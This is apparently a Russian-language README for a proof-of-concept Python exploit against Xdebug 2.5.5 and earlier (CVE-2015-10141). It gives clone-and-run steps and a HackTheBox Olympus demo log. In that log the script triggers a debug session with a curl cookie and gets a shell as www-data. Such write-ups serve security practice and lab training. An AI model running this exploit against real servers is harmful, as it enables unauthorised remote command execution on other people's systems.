
Скрипт эксплойта для проверки концепции для Xdebug 2.5.5 и более ранних версий (CVE-2015-10141).
Пользовательский эксплойт на Python для Xdebug ≤ 2.5.5 (CVE-2015-10141).
Этот репозиторий содержит мой эксплойт Proof-of-Concept (PoC) для уязвимости удаленного выполнения кода Xdebug в версиях 2.5.5 и ранее.
Скрипт использует неаутентифицированный отладочный протокол, открытый на порту 9000, для достижения удаленного выполнения команд.
git clone https://github.com/n0m4d22/PoC-CVE-2015-10141.git
cd PoC-CVE-2015-10141
python3 exploit.py
При запросе введите целевой IP-адрес, на котором размещен Xdebug.
Демонстрация из моего недавнего разбора HackTheBox Olympus (Medium):
┌──(kali㉿kali)-[~]
└─$ python exploit.py
[*] Target IP: 10.129.124.136
[*] Connecting to 0.0.0.0:9000 ...
[*] Initializing debugging: curl http://10.129.124.136 -H "Cookie: XDEBUG_SESSION=olympus"
[*] Connection to ('10.129.124.136', 36354) established.
$ whoami
www-data
Этот проект создан только в образовательных целях.
НЕ используйте этот эксплойт против систем без явного разрешения. Я не несу ответственности за любое неправомерное использование этого кода.